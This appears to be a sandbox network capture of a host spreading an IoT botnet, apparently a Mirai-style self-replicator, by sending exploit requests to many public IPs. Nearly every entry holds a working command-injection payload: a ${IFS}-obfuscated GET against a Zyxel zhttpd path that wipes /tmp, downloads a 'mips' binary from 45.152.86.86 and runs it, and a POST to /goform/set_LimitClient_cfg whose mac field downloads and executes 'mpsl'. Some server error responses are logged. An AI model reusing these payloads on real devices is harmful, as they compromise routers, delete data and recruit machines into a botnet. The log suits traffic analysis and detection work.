                                        Mar 31, 2024 09:22:39.834856033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9016192.168.2.2338904180.191.141.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834887981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9017192.168.2.233819454.63.5.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834947109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9018192.168.2.2338464118.58.80.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.834988117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9019192.168.2.235343431.165.57.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.835019112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9020192.168.2.235949031.61.147.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.835069895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9021192.168.2.233923231.164.95.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.835095882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9022192.168.2.2348984141.223.121.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.835136890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9023192.168.2.2349076121.166.46.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.835172892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9024192.168.2.2347530125.130.254.968080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:40.381637096 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9025192.168.2.2333136197.179.130.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:40.847899914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9026192.168.2.23398208.32.94.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:40.848126888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9027192.168.2.2342184104.27.10.1488080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:41.782414913 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:41.876765966 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:22:41 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9028192.168.2.2333664105.229.145.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:41.859060049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9029192.168.2.2335122180.16.175.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:41.859112024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9030192.168.2.2357302152.146.13.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:41.859169960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9031192.168.2.2336960131.74.13.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:41.859220982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9032192.168.2.2354774213.86.182.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:41.859373093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9033192.168.2.2358246206.238.237.1578080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:41.877707958 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:41.972261906 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:22:41 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9034192.168.2.2340094196.51.59.1498080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.042573929 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:42.210869074 CEST1286INHTTP/1.1 400 Bad Request
                                        Server: squid/3.5.20
                                        Mime-Version: 1.0
                                        Date: Sun, 31 Mar 2024 00:36:47 GMT
                                        Content-Type: text/html;charset=utf-8
                                        Content-Length: 3469
                                        X-Squid-Error: ERR_INVALID_URL 0
                                        Connection: close
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9035192.168.2.2351100175.239.203.2388080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.334744930 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:42.626039982 CEST103INHTTP/1.1 404 Not Found
                                        Content-Type: text/plain
                                        Content-Length: 30
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9036192.168.2.233903243.243.243.1768080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.348572016 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:43.908838034 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:45.764540911 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:49.476063967 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:56.899104118 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9037192.168.2.235628032.165.78.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.862324953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9038192.168.2.234725475.116.204.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.862360954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9039192.168.2.2354190133.216.175.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.862425089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9040192.168.2.233616235.70.50.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.862468004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9041192.168.2.2356570195.185.225.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.862623930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9042192.168.2.2355112101.74.11.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:42.862653017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9043192.168.2.2333808125.23.83.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:43.865802050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9044192.168.2.2335286100.237.96.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:43.865843058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9045192.168.2.2352108139.51.93.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:43.865964890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9046192.168.2.2347492174.160.32.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:43.866097927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9047192.168.2.235108659.157.223.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:43.866121054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9048192.168.2.233385436.209.59.233443
                                        TimestampBytes transferredDirectionData
